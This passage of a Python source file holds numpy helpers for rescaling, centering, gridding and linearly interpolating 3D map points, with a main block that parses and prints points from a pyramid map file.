Rescale points to [0, 1] range. Assuming positive coordinates
:param points:
:return:
"""
return points / points.max(axis=0)
def center(points):
"""
Move x and y to the center. If points were rescaled, ie new range is [0, 1],
then this will move center from [0.5, 0.5] to [1, 1].
Height is left unchanged
:param points: map points
:return: rescaled points
"""
if len(points) == 1:
return points
pmin = points[:, :-1].min(axis=0)
pmax = points[:, :-1].max(axis=0)
half = (pmax - pmin) / 2
return np.hstack((points[:, :-1] + half, points[:, -1][:, None]))
def gen_borders(xmin=0, xmax=1, ymin=0, ymax=1, n_points=50):
""" Generate border points """
border = []
border += [[_, ymin, 0] for _ in np.linspace(xmin, xmax, n_points)]
border += [[xmin, _, 0] for _ in np.linspace(ymin, ymax, n_points)]
border += [[xmax, _, 0] for _ in np.linspace(ymin, ymax, n_points)]
border += [[_, ymax, 0] for _ in np.linspace(xmin, xmax, n_points)]
return np.array(border)
def gen_grid(xmin=0, xmax=1, ymin=0, ymax=1, n_points=50):
""" Given two vertices, generate grid between them """
x = np.linspace(xmin, xmax, n_points)
y = np.linspace(ymin, ymax, n_points)
return np.meshgrid(x, y)
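# e.g. X, Y = gen_grid(n_points=3) returns two 3x3 coordinate arrays covering
# the unit square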
def normalize(points):
mx = max([max(point) for point in points])
mn = min([min(point) for point in points])
return [[(_ - mn) / (mx - mn) for _ in point] for point in points]
def lin_interpolate(point, xmin=0, xmax=1, ymin=0, ymax=1, zmin=0, zmax=1, steps=50):
interpol = [] # funny name ;)
px, py, pz = point
for x in np.linspace(xmin, xmax, steps):
for y in np.linspace(ymin, ymax, steps):
d = (x - xmin) / (xmax - xmin) * (zmax - zmin) + \
(y - ymin) / (ymax - ymin) * (zmax - zmin)
interpol.append((x, y, d))
return interpol
if __name__ == '__main__':
points = parse_file('../resources/piramid.mod1')
for point in points:
print(point)
h = points[0]
for p in lin_interpolate(points[0], 0, 2, 0, 2, 0, 1, 5):
print(p)
|